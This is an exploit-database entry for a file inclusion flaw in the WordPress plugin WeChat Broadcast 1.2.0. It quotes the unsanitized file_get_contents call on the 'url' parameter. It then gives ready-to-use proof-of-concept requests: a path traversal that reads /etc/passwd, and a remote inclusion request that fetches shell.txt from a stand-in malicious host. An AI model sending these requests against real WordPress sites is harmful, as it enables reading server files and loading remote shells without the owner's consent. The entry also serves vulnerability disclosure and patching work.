Exploits / Vulnerability Discovered : 2018-09-19 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress plugin wechat broadcast 1.2.0 local file inclusion is for educational purposes only and if it is used you will do on your own risk!
# Description
# This bug was found in the file: /wechat-broadcast/wechat/Image.php
# echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');
# The parameter "url" it is not sanitized allowing include local or remote files
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol
# to interact with the application.
# PoC
# The following URL have been confirmed that is vulnerable to local and remote file inclusion.
GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
# Remote File Inclusion POC:
GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt
Wordpress plugin wechat broadcast 1.2.0 local file inclusion